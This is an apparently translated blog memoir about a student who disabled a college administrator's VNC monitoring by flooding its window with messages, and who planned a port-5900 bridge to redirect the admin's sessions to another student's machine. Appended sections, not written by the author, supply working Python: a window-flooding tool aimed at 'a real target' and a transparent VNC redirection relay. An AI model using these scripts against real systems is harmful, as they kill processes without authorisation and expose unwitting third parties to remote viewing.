Battle of the Coders: Me Against That VNC Guy

A lot of programming tales have been published on this blog. I like to reminisce about my old foolishness. Well, here is another such story.

I first became interested in computers, and programming in particular, when I was about 11. By the start of secondary school I spent most of my free time fiddling with my C64 and writing BASIC, then cutting the bad code out of the printouts with scissors. I'm not kidding: scissors.

After school (at around 16), British children usually go to college, where they pick three or four subjects to study before university. Given my love of the beige box and tape recorder at home, I decided that studying "computer science" at college was the right choice.

I liked the course more than I expected; it was there that I first met Pascal and Delphi.

During breaks between classes, students could work on any free machine in the computer room. Picture it: a huge room, built for about a hundred people, with rows of tables lined with machines, the kind where the monitor sits on top of the system unit. The constant buzz of fans, mouse balls rumbling across the tables without a second's pause. A strange smell in the air, as if 50 to 100 hormonal teenagers were being cycled through the room to cool hundreds of Pentium III chips.

Despite the health risks, I liked to sit at the computer when I had a free minute.

The admin on duty in the room was a short, middle-aged man who, I suspect, had been chosen for the role because of his irrepressible desire to become an evil dictator. "On duty" is an understatement; the guy really loved his job. He was there to keep order, so that nobody used a college computer for anything inappropriate.

And to this day my intuition tells me that the administrator's bonus depended directly on the number of students he caught red-handed and escorted out of the computer room. I'm pretty sure this guy paid off his mortgage early.

He sat at a table in the far corner of the room. It was safe to assume that his monitors had found a way to reproduce, with an impressively short gestation period: there were that many of them. One could only wonder whether he really had time to keep track of them all. I'm joking, of course... did I mention he was very serious about his work?

At the time the college network ran Windows 2000. I soon discovered that every time I logged on, a logon script started a VNC server on my machine, running under the admin's account, for remote desktop access. Whenever the guy wanted to spy on you, he connected straight to your machine and watched. It was creepy and, thinking about it now, probably illegal.

Having cut my teeth on BASIC and the C64, I was now writing C and even some C++. At the time I was also very interested in the D language, which fixed some of C++'s shortcomings, as I saw it then.

I used to go to the computer room to read up on something new in D or play around with the Digital Mars D compiler. When I could tear myself away from D's glorious future, I wrote C code to poke at other Win32 programs through their window handles.

In the good old days of Win32 programming, looking up a window handle was the easiest way to meddle with other programs. Every GUI program on Windows has a window, even if it isn't shown on screen. By writing a program that retrieves a handle to another process's window, you could send messages to it. That allowed basic things like hiding or showing the program's window, and, since the window handle also leads to the thread and process that own it (GetWindowThreadProcessId), some really cool stuff like making the process load an arbitrary DLL into its address space and start executing your code (a hook installed with SetWindowsHookEx on that thread is one classic way). After the DLL injection, the fun began.

For the first month and a half the detective didn't really bother me; he connected to the VNC server on my machine only once or twice. But one particular session must have piqued his interest. I was writing some C code to hide Minesweeper windows (without closing them), to make it easier to play in class, when I noticed that the white VNC icon in the system tray had turned black. That meant he was now watching me.

I carried on coding as usual, trying to ignore him. Meanwhile the machine started to really crawl, trying to push the maximum frame rate to one of the countless monitors in the corner of the room. Windows had almost stopped responding by the time my patience snapped; I logged out and called it a day.

On subsequent visits to the computer room, Columbo took a keen interest in what I was doing almost every time. After about the fourth time I decided something had to be done about it.

I admit that a reasonable, rational person could simply have raised the issue directly with him or his boss. But I always gave in to temptation, and I quickly talked myself into a completely different strategy.

"You can't do anything without this VNC server!" I said to myself, calmly and decisively, several times.

VNC had to die.

I started entering the computer room with large groups of students and sitting as far as possible from the corner with the monitors. That worked for a while and bought me some time to test ideas.

My first attempt, you'll agree, was rather weak. Right-clicking the VNC icon in the system tray brought up a menu with the magic word EXIT. Unfortunately, the word was greyed out: the administrator had disabled the Exit item through Group Policy. I tried to kill the process from Task Manager, but of course I couldn't, because it was running under a different, more privileged account. Nothing happened.

The VNC server listens on TCP port 5900, I remembered. My next plan was to send malformed packets to that port to make it crash.

For at least a few days I picked apart the protocol, sending various well-formed and not-so-well-formed rubbish to port 5900 in the hope that something would break. In the end that didn't work either.

I was starting to think I would never get rid of the thing when it suddenly dawned on me: there must be a window! It just needs to be shown. Maybe it would have a nice juicy Close button that I could put to good use!

I ran my near-perfect C code to find another process's main window handle, and sure enough I found VNC. I felt elated as my fingers typed WM_SHOWWINDOW. Guess what I saw in front of me?

Nothing!

Now I was curious... it had a window, but it was ignoring my messages. I double-checked my code to make sure it worked. Tested it on several other processes: worked fine. I tried sending other messages to the VNC window; still nothing.

And then it dawned on me again!

Thanks to Charles Petzold's very thick book, I had carefully studied how Win32 processes work inside the system. Every Win32 GUI application has a window and, for each thread that creates windows, a message queue. Messages generated by user interaction, as well as messages sent by Windows itself, go into the queue, and the application itself decides how to handle them.

Not very interesting on its own. But when I realised that a window whose thread stops servicing its message queue for long enough is exactly what Windows treats as a hung application and steps in on, and that a flood of unprocessed messages might get it there, I broke into a sweat of pure serotonin.

Without wasting a second, I went back to my C code, this time preparing to send one more message to VNC's main window: WM_SHOWWINDOW. In a loop. An infinite one. So many WM_SHOWWINDOW messages, which I now knew VNC would try its hardest to ignore... at its own peril.

I compiled and ran the 4K of the most free-spirited code I have ever run. After about three seconds Windows reported that the process vncserver.exe was not responding, and made me an offer I simply couldn't refuse:

Do you want to end this process?

Damn it, YES!

I'll confess that for the rest of the day I was unbearably pleased with myself.

After spending a few hours digesting my new superpower, I decided how I would use it. Just killing the session right in front of his eyes was too easy. I had a better idea: to disappear altogether.

After my baptism of fire in socket programming, I realised I could write code that did two things. First, it would take over the newly freed TCP port 5900, previously occupied by the now-dead VNC server process. Then it would open a new TCP connection to the VNC server on some other machine. The code would simply proxy all data between the two sockets, and Columbo would think he was connecting to me when in fact he was connecting to a completely different VNC server.

My code would act as a secret bridge between my machine and some other poor soul of my choosing. It was wonderful.

I immediately started writing my fake VNC bridge. Columbo connected to me several times, but I kept programming right in front of him. I concluded that he had no idea what I was doing, even though I was writing obvious things like port numbers and comments such as // Goodbye, creepy VNC spy.

A couple of days in, I still couldn't get the code working properly. To make matters worse, I was almost constantly working with a black VNC icon in the tray. While he was connected, I couldn't free the port to test my code.

If only I had known about netcat then!

In the end my nerves gave out; after all, I was an impatient 17-year-old. Watching the white VNC icon turn black yet again, I snapped, opened the original code that flooded the message queue, and ran it right in front of him. I even waited a couple of seconds before clicking End Process, just to make sure he saw it.

If pressing that button hadn't entirely convinced me it was worth it, his leap from behind his monitor fortress to hurry over and escort me out of the room certainly did.

The upshot: I was banned from the network for two weeks. A fair punishment, I thought. About three weeks later the VNC server disappeared from the logon scripts and never came back. I never found out whether my incident played a part in that, but it completely ruined my plan to get fabulously rich selling my VNC gun to downtrodden students in college computer rooms across the country.
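As an added example (not the author's original C, which the post does not reproduce), here is the same idea in Python with ctypes: locate the target's top-level window by title, walk from the handle to its owning thread and process, and post WM_SHOWWINDOW in a loop while asking user32 whether the window has hung. The window title, the default deadline and the helper names are assumptions of this example. One caveat the story glosses over: Windows judges a window hung when its thread has not pumped messages for about five seconds (IsHungAppWindow), not by queue size as such, and PostMessage is refused once roughly 10,000 messages sit unread in the target's queue, so whether a flood actually hangs a given target depends on how that target handles the messages; the loop reports both counts so you can see which is happening. The user32 bindings load only on Windows; the posting and hang-check calls are parameters so the loop logic can be exercised with fakes elsewhere.

```python
import sys
import time
import ctypes

WM_SHOWWINDOW = 0x0018   # the message the story's loop hammers the window with
HUNG_TIMEOUT_S = 5.0     # user32 treats a window as hung after ~5 s without its thread pumping

if sys.platform == "win32":
    from ctypes import wintypes
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    user32.FindWindowW.argtypes = (wintypes.LPCWSTR, wintypes.LPCWSTR)
    user32.FindWindowW.restype = wintypes.HWND
    user32.PostMessageW.argtypes = (wintypes.HWND, wintypes.UINT, wintypes.WPARAM, wintypes.LPARAM)
    user32.PostMessageW.restype = wintypes.BOOL
    user32.IsHungAppWindow.argtypes = (wintypes.HWND,)
    user32.IsHungAppWindow.restype = wintypes.BOOL
    user32.GetWindowThreadProcessId.argtypes = (wintypes.HWND, ctypes.POINTER(wintypes.DWORD))
    user32.GetWindowThreadProcessId.restype = wintypes.DWORD


def find_window(title):
    """Top-level window handle by exact title (FindWindowW). The title is an
    assumption: whatever the target's hidden main window is called."""
    hwnd = user32.FindWindowW(None, title)
    if not hwnd:
        raise LookupError("no top-level window titled %r" % title)
    return hwnd


def owner_pid(hwnd):
    """The window handle leads to the thread and process that own it; this is
    the process the story could see in Task Manager but not kill."""
    pid = wintypes.DWORD(0)
    tid = user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
    return tid, pid.value


def flood_until_hung(hwnd, msg=WM_SHOWWINDOW, deadline_s=3 * HUNG_TIMEOUT_S,
                     post=None, is_hung=None, clock=time.monotonic):
    """Post `msg` to hwnd in a tight loop until user32 reports the window hung
    or `deadline_s` elapses. Returns (hung, posted, refused).

    `post(hwnd, msg) -> bool` and `is_hung(hwnd) -> bool` default to user32 on
    Windows and are injectable for testing. `refused` counts PostMessage
    failures: user32 refuses once about 10,000 messages are queued unread
    (ERROR_NOT_ENOUGH_QUOTA). A rising `refused` with `hung` still False means
    the target is alive and simply not draining its queue yet; the hang verdict
    only comes after the thread has not pumped messages for ~5 s."""
    if post is None:
        def post(h, m):
            return bool(user32.PostMessageW(h, m, 0, 0))
    if is_hung is None:
        def is_hung(h):
            return bool(user32.IsHungAppWindow(h))
    start = clock()
    posted = refused = 0
    while clock() - start < deadline_s:
        if post(hwnd, msg):
            posted += 1
        else:
            refused += 1
        if is_hung(hwnd):
            return True, posted, refused
    return False, posted, refused


if __name__ == "__main__":
    # Usage (Windows only): python flood.py "<exact window title>"
    hwnd = find_window(sys.argv[1])
    print("window %#x belongs to (thread, pid) %s" % (hwnd, owner_pid(hwnd)))
    print("hung=%s posted=%d refused=%d" % flood_until_hung(hwnd))
```

On a real target, run it against a throwaway process of your own first: a window that handles WM_SHOWWINDOW promptly will show `refused` climbing and `hung` staying False, which is the honest answer that the flood alone is not what stalls a well-behaved message pump.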
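As an added example, not the author's bridge code, here is that plan in Python. It covers both the protocol poking from earlier (the 12-byte RFB ProtocolVersion banner a VNC server sends first, with a strict parser that rejects malformed ones) and the bridge itself. So that it runs offline and unprivileged it uses a constructed stand-in for the other machine's VNC server that only performs the RFB 3.3 version handshake and offers security type None, and it binds ephemeral loopback ports instead of 5900; the function names and the one-client-per-run bridge are assumptions of the example.

```python
import socket
import struct
import threading

# RFB (VNC) ProtocolVersion banner: exactly 12 bytes, "RFB xxx.yyy\n".
# VNC 3.3 servers of the Windows 2000 era announced 003.003.
RFB_VERSION = b"RFB 003.003\n"
SECURITY_NONE = 1  # RFB 3.3 security type "None", sent as a 4-byte big-endian integer


def parse_rfb_version(banner):
    """Validate a 12-byte RFB ProtocolVersion message and return (major, minor).
    Raises ValueError on anything malformed, which is how a robust server treats
    the 'well-structured crap' from the story instead of crashing."""
    if (len(banner) != 12 or banner[:4] != b"RFB " or banner[7:8] != b"."
            or banner[11:12] != b"\n"):
        raise ValueError("not an RFB ProtocolVersion message: %r" % banner)
    major, minor = banner[4:7], banner[8:11]
    if not (major.isdigit() and minor.isdigit()):
        raise ValueError("non-numeric RFB version: %r" % banner)
    return int(major), int(minor)


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed early")
        buf += chunk
    return buf


def start_fake_vnc_server():
    """Constructed stand-in for the other poor soul's VNC server: version
    handshake, then security type None, then close. Returns its loopback port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(RFB_VERSION)
            parse_rfb_version(recv_exact(conn, 12))   # reject garbage clients
            conn.sendall(struct.pack(">I", SECURITY_NONE))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def start_bridge(target_host, target_port):
    """The secret bridge: listen where the dead VNC server used to (port 0 here
    instead of 5900), and for one incoming viewer open a second TCP connection
    to the target and pump bytes both ways. Returns the listening port."""
    lsock = socket.socket()
    lsock.bind(("127.0.0.1", 0))
    lsock.listen(1)

    def pump(src, dst):
        try:
            while True:
                data = src.recv(4096)
                if not data:
                    break
                dst.sendall(data)
        except OSError:
            pass
        finally:
            try:
                dst.shutdown(socket.SHUT_WR)   # propagate EOF to the other side
            except OSError:
                pass

    def bridge():
        viewer, _ = lsock.accept()
        lsock.close()
        upstream = socket.create_connection((target_host, target_port))
        t = threading.Thread(target=pump, args=(viewer, upstream), daemon=True)
        t.start()
        pump(upstream, viewer)
        t.join()
        viewer.close()
        upstream.close()

    threading.Thread(target=bridge, daemon=True).start()
    return lsock.getsockname()[1]


def probe(host, port):
    """Act as the spying viewer: connect, do the version handshake, and return
    (major, minor, security_type) as seen through whatever answers on the port."""
    with socket.create_connection((host, port), timeout=5) as s:
        major, minor = parse_rfb_version(recv_exact(s, 12))
        s.sendall(RFB_VERSION)
        (sectype,) = struct.unpack(">I", recv_exact(s, 4))
    return major, minor, sectype


if __name__ == "__main__":
    victim_port = start_fake_vnc_server()
    bridge_port = start_bridge("127.0.0.1", victim_port)
    print(probe("127.0.0.1", bridge_port))   # the viewer sees the other machine's VNC
```

The bridge is transparent to the viewer because RFB has no notion of which host it was meant to reach: the first bytes on the wire come from the server, so whoever sits on port 5900 and relays faithfully is indistinguishable from the real thing. That is the same property that makes the admin's plaintext VNC sessions easy to redirect in the first place.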

Source: habr.com
